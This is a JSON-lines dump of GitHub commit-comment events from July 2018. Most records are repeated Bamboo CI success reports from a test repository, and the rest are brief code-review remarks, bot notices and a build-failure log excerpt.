{"id":"7967766076","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713894,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-15T18:39:59Z","updated_at":"2018-07-15T18:39:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:39:59Z"}
{"id":"7967766094","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713895,"position":48,"line":99,"path":"js/app.js","commit_id":"4de150aa3768f3aaa1ad9ceb66674d2cddc23935","created_at":"2018-07-15T18:40:00Z","updated_at":"2018-07-15T18:40:00Z","author_association":"NONE","body":"Très bien ça.\r\n\r\nComme `theatreComplet` contient déjà une valeur booléenne, `true`, tu n'as même pas besoin de la comparer avec `true` :\r\n\r\n``` js\r\nif (argent >= 30 && theatreComplet) {\r\n```"}},"created_at":"2018-07-15T18:40:00Z"}
{"id":"7967766398","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"khammileon/s02e01-challenge1"},"payload":{"comment":{"id":29713896,"position":null,"line":null,"path":null,"commit_id":"4de150aa3768f3aaa1ad9ceb66674d2cddc23935","created_at":"2018-07-15T18:40:13Z","updated_at":"2018-07-15T18:40:13Z","author_association":"NONE","body":"Good good :+1: "}},"created_at":"2018-07-15T18:40:13Z"}
{"id":"7967766540","type":"CommitCommentEvent","actor":{"login":"GreaterFire"},"repo":{"name":"AOSC-Dev/aosc-os-abbs"},"payload":{"comment":{"id":29713897,"position":null,"line":null,"path":null,"commit_id":"f6dc87c0eb265bb26b0740974c074730fe3df9d5","created_at":"2018-07-15T18:40:18Z","updated_at":"2018-07-15T18:40:18Z","author_association":"CONTRIBUTOR","body":"A dependency needs to be added in 1.5.0. See #1283. Thanks."}},"created_at":"2018-07-15T18:40:18Z"}
{"id":"7967767123","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29713899,"position":null,"line":null,"path":null,"commit_id":"ee418cef25f0f1986b71562e5ebcceae29f48b41","created_at":"2018-07-15T18:40:46Z","updated_at":"2018-07-15T18:40:46Z","author_association":"OWNER","body":"Collision 550.19~550.29"}},"created_at":"2018-07-15T18:40:46Z"}
{"id":"7967767157","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713900,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-15T18:40:48Z","updated_at":"2018-07-15T18:40:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:40:48Z"}
{"id":"7967767407","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713902,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-15T18:41:00Z","updated_at":"2018-07-15T18:41:00Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:41:00Z"}
{"id":"7967767574","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713903,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-15T18:41:09Z","updated_at":"2018-07-15T18:41:09Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:41:09Z"}
{"id":"7967768463","type":"CommitCommentEvent","actor":{"login":"AlexDaniel"},"repo":{"name":"perl6/roast"},"payload":{"comment":{"id":29713904,"position":null,"line":null,"path":null,"commit_id":"71aefdf8fb9247ba3a51eb6adb3cd8a3130818ad","created_at":"2018-07-15T18:41:52Z","updated_at":"2018-07-15T18:41:52Z","author_association":"MEMBER","body":"FWIW same with `@( )`"}},"created_at":"2018-07-15T18:41:52Z"}
{"id":"7967768503","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713905,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-15T18:41:54Z","updated_at":"2018-07-15T18:41:54Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:41:54Z"}
{"id":"7967768881","type":"CommitCommentEvent","actor":{"login":"pakanwit"},"repo":{"name":"pakanwit/pugnaja"},"payload":{"comment":{"id":29713906,"position":null,"line":null,"path":null,"commit_id":"fbd0296719ed1c75451e5a7f6e993b5a617ef11d","created_at":"2018-07-15T18:42:13Z","updated_at":"2018-07-15T18:42:13Z","author_association":"OWNER","body":"init readme"}},"created_at":"2018-07-15T18:42:13Z"}
{"id":"7967768921","type":"CommitCommentEvent","actor":{"login":"andrewsardone"},"repo":{"name":"cdzombak/dotfiles"},"payload":{"comment":{"id":29713907,"position":null,"line":null,"path":null,"commit_id":"25e3d8fe8aa954de9ce13affa6d9df909e241169","created_at":"2018-07-15T18:42:15Z","updated_at":"2018-07-15T18:42:15Z","author_association":"NONE","body":"👏 "}},"created_at":"2018-07-15T18:42:15Z"}
{"id":"7967768947","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713908,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-15T18:42:16Z","updated_at":"2018-07-15T18:42:16Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:42:16Z"}
{"id":"7967769033","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713909,"position":null,"line":null,"path":null,"commit_id":"46f14abc96336851feee32a7fc631c00ae8ef2ff","created_at":"2018-07-15T18:42:20Z","updated_at":"2018-07-15T18:42:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:42:20Z"}
{"id":"7967769500","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29713910,"position":null,"line":null,"path":null,"commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-15T18:42:43Z","updated_at":"2018-07-15T18:42:43Z","author_association":"MEMBER","body":"Oh, that makes sense, why you used the `&&` I mean. Yeah, that definitely justifies changing it to what you had changed it to, my bad.\r\n\r\nI did restore the functional code, I'm not sure why your change was failing. There were no errors, but the windows were super small.\r\n\r\nThat's definitely odd, maybe it's an issue with the gnome terminal, the issue with the control sequence, I mean."}},"created_at":"2018-07-15T18:42:43Z"}
{"id":"7967769897","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713911,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-15T18:43:02Z","updated_at":"2018-07-15T18:43:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:43:02Z"}
{"id":"7967770099","type":"CommitCommentEvent","actor":{"login":"cemo"},"repo":{"name":"PebbleTemplates/pebble"},"payload":{"comment":{"id":29713912,"position":2,"line":1,"path":"pebble/CHANGELOG.md","commit_id":"c2a74c3ca7593ec5d71b5dd75f7bcb7ea52142a7","created_at":"2018-07-15T18:43:11Z","updated_at":"2018-07-15T18:43:11Z","author_association":"NONE","body":"@ebussieres is there any benchmark for latest release you have? In release notes I noticed that there is a note regarding it. "}},"created_at":"2018-07-15T18:43:11Z"}
{"id":"7967770237","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/ruamel.yaml-feedstock"},"payload":{"comment":{"id":29713913,"position":null,"line":null,"path":null,"commit_id":"378ebafa77d6d45df795f7d483728385b30e54c7","created_at":"2018-07-15T18:43:17Z","updated_at":"2018-07-15T18:43:17Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mbargull were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-15T18:43:17Z"}
{"id":"7967770517","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713914,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-15T18:43:30Z","updated_at":"2018-07-15T18:43:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:43:30Z"}
{"id":"7967771126","type":"CommitCommentEvent","actor":{"login":"JamesDelfini"},"repo":{"name":"JamesDelfini/Android-Mastery"},"payload":{"comment":{"id":29713919,"position":22,"line":22,"path":"app/src/main/java/com/delfini/android_mastery/SampleRecyclerViewAdapter.java","commit_id":"cb0e6632153a4a85f9300fc2fdcb43b4ec37f693","created_at":"2018-07-15T18:44:03Z","updated_at":"2018-07-15T18:44:03Z","author_association":"OWNER","body":"SampleRecyclerViewAdapter is added after implemented the method for Recyclerview Adapter"}},"created_at":"2018-07-15T18:44:03Z"}
{"id":"7967771289","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713920,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-15T18:44:10Z","updated_at":"2018-07-15T18:44:10Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:44:10Z"}
{"id":"7967771593","type":"CommitCommentEvent","actor":{"login":"shuayb"},"repo":{"name":"toolboc/faithcoin"},"payload":{"comment":{"id":29713921,"position":null,"line":null,"path":null,"commit_id":"998a8e666ce04f09ed156b1aaa4a1813dcceacc2","created_at":"2018-07-15T18:44:23Z","updated_at":"2018-07-15T18:44:23Z","author_association":"NONE","body":"How are you fixing them? Sorry can you explain? "}},"created_at":"2018-07-15T18:44:23Z"}
{"id":"7967772005","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713922,"position":null,"line":null,"path":null,"commit_id":"609f0a68dd9493a8c90a4deeec0e8eca9dcb24a3","created_at":"2018-07-15T18:44:46Z","updated_at":"2018-07-15T18:44:46Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:44:46Z"}
{"id":"7967772636","type":"CommitCommentEvent","actor":{"login":"joshinils"},"repo":{"name":"JDAPweb/WA-project"},"payload":{"comment":{"id":29713924,"position":5,"line":8,"path":"detail.php","commit_id":"9c53151671d2331a3af9906d4a862d498caee05c","created_at":"2018-07-15T18:45:14Z","updated_at":"2018-07-15T18:45:14Z","author_association":"COLLABORATOR","body":"ich hab hier einfach mal alle 4 leerzeichen mit nem tab ersetzt, deshalb ist alles \"anders\""}},"created_at":"2018-07-15T18:45:14Z"}
{"id":"7967772782","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713927,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-15T18:45:20Z","updated_at":"2018-07-15T18:45:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:45:20Z"}
{"id":"7967774244","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"GroceriStar/react-only-intern-23"},"payload":{"comment":{"id":29713929,"position":18,"line":24,"path":"src/component/Modals/AddMealModal.js","commit_id":"b57cc5708ff31f0ab958fa8fe0a7b98bbeee1916","created_at":"2018-07-15T18:46:29Z","updated_at":"2018-07-15T18:46:29Z","author_association":"MEMBER","body":"Should be separated as usually :)"}},"created_at":"2018-07-15T18:46:29Z"}
{"id":"7967774351","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713930,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-15T18:46:34Z","updated_at":"2018-07-15T18:46:34Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-15T18:46:34Z"}
{"id":"7967777921","type":"CommitCommentEvent","actor":{"login":"gwolf2u"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29713932,"position":17,"line":44,"path":"update.xml","commit_id":"c0694bfc2abe9a76323835389c9a8693c9d70933","created_at":"2018-07-15T18:49:26Z","updated_at":"2018-07-15T18:49:26Z","author_association":"MEMBER","body":"yeah kind of missed that \r\npushing in my OTA update "}},"created_at":"2018-07-15T18:49:26Z"}
{"id":"7967778035","type":"CommitCommentEvent","actor":{"login":"zoffixznet"},"repo":{"name":"perl6/roast"},"payload":{"comment":{"id":29713933,"position":null,"line":null,"path":null,"commit_id":"71aefdf8fb9247ba3a51eb6adb3cd8a3130818ad","created_at":"2018-07-15T18:49:32Z","updated_at":"2018-07-15T18:49:32Z","author_association":"MEMBER","body":"Good catch.\r\n\r\nI'm gonna leave it since this is 6.d spec and those special meanings won't exist in 6.d: https://github.com/perl6/6.d-prep/blob/master/TODO/FEATURES.md#remove--magicalness-from--and-"}},"created_at":"2018-07-15T18:49:32Z"}
{"id":"7967778302","type":"CommitCommentEvent","actor":{"login":"datitisev"},"repo":{"name":"flarum/core"},"payload":{"comment":{"id":29713934,"position":null,"line":null,"path":null,"commit_id":"fb9a89f67ffc3cc81ed765d459745ca8dc73c229","created_at":"2018-07-15T18:49:44Z","updated_at":"2018-07-15T18:49:44Z","author_association":"CONTRIBUTOR","body":"@TurboProgramming DevTools on browsers only applies **vanilla** css, Flarum uses LESS, which is why the background, color, and box shadow aren't appearing."}},"created_at":"2018-07-15T18:49:44Z"}
{"id":"7967778920","type":"CommitCommentEvent","actor":{"login":"cris0195"},"repo":{"name":"cris0195/udemy-heroes"},"payload":{"comment":{"id":29713936,"position":null,"line":null,"path":null,"commit_id":"3f16d48ce750aa3b78a7f136cc45dec318454790","created_at":"2018-07-15T18:50:12Z","updated_at":"2018-07-15T18:50:12Z","author_association":"OWNER","body":"🍄 "}},"created_at":"2018-07-15T18:50:12Z"}
{"id":"7967779656","type":"CommitCommentEvent","actor":{"login":"gnunua"},"repo":{"name":"koreezgames/robotlegsjs-phaser3"},"payload":{"comment":{"id":29713937,"position":null,"line":null,"path":null,"commit_id":"3895c15bd428a0c9bdeb05b8329186d47ee0d382","created_at":"2018-07-15T18:50:42Z","updated_at":"2018-07-15T18:50:42Z","author_association":"MEMBER","body":"@saqsun Great work!"}},"created_at":"2018-07-15T18:50:42Z"}
{"id":"7967779839","type":"CommitCommentEvent","actor":{"login":"PascalSchumacher"},"repo":{"name":"joel-costigliola/assertj-core"},"payload":{"comment":{"id":29713938,"position":null,"line":null,"path":null,"commit_id":"dc6e6f258ae68dce07d6e17ba7b9c4d9d3ae313d","created_at":"2018-07-15T18:50:50Z","updated_at":"2018-07-15T18:50:50Z","author_association":"COLLABORATOR","body":"Build failure is  on java 9 is unrelated:\r\n\r\n>[INFO] BUILD FAILURE\r\n>[INFO] ------------------------------------------------------------------------\r\n>[INFO] Total time: 06:02 min\r\n>[INFO] Finished at: 2018-07-15T18:44:01Z\r\n>[INFO] ------------------------------------------------------------------------\r\n>[ERROR] Failed to execute goal org.sonarsource.scanner.maven:sonar-maven-plugin:3.4.0.905:sonar (default-cli) on project assertj-core: Fail to request https://sonarcloud.io/api/ce/submit?organization=default&projectKey=org.assertj:assertj-core&projectName=AssertJ%20fluent%20assertions: timeout: Connection closed by remote host -> [Help 1]"}},"created_at":"2018-07-15T18:50:50Z"}
{"id":"7967780475","type":"CommitCommentEvent","actor":{"login":"switch900"},"repo":{"name":"switch900/school_projects_1"},"payload":{"comment":{"id":29713939,"position":null,"line":null,"path":null,"commit_id":"584f0b062054d06af3c34b0c61e6001f87307051","created_at":"2018-07-15T18:51:18Z","updated_at":"2018-07-15T18:51:18Z","author_association":"OWNER","body":"Intro To Java 1"}},"created_at":"2018-07-15T18:51:18Z"}
{"id":"7967780851","type":"CommitCommentEvent","actor":{"login":"gevayoni"},"repo":{"name":"gevayoni/website"},"payload":{"comment":{"id":29713940,"position":null,"line":null,"path":null,"commit_id":"35a631ca9a2503387e99118708fbfa9b0fed1b3a","created_at":"2018-07-15T18:51:33Z","updated_at":"2018-07-15T18:51:33Z","author_association":"OWNER","body":"change"}},"created_at":"2018-07-15T18:51:33Z"}
{"id":"7967781537","type":"CommitCommentEvent","actor":{"login":"TurboProgramming"},"repo":{"name":"flarum/core"},"payload":{"comment":{"id":29713941,"position":null,"line":null,"path":null,"commit_id":"fb9a89f67ffc3cc81ed765d459745ca8dc73c229","created_at":"2018-07-15T18:52:08Z","updated_at":"2018-07-15T18:52:08Z","author_association":"NONE","body":"@datitisev So you mean that this will work in Beta 8 after we directly change the code instead of just using DevTools, am I right?"}},"created_at":"2018-07-15T18:52:08Z"}
{"id":"7967781854","type":"CommitCommentEvent","actor":{"login":"antelopeb"},"repo":{"name":"Pearson-Higher-Ed/elements-sdk"},"payload":{"comment":{"id":29713943,"position":19,"line":27,"path":"src/styles/base/_mixins.scss","commit_id":"1d77bdf3f0a254d2265fd947bdb8f561886e84bc","created_at":"2018-07-15T18:52:22Z","updated_at":"2018-07-15T18:52:22Z","author_association":"CONTRIBUTOR","body":"@whatevers -- where is that button? Because this is in Master, and that button (pill-shaped) is only in the Beta branch. You will have to manually modify it to be pill shaped for the outline. Otherwise the methodology tests out solid in all browsers and use cases we've seen."}},"created_at":"2018-07-15T18:52:22Z"}
{"id":"7967783059","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29713945,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-15T18:53:20Z","updated_at":"2018-07-15T18:53:20Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-15T18:53:20Z"}
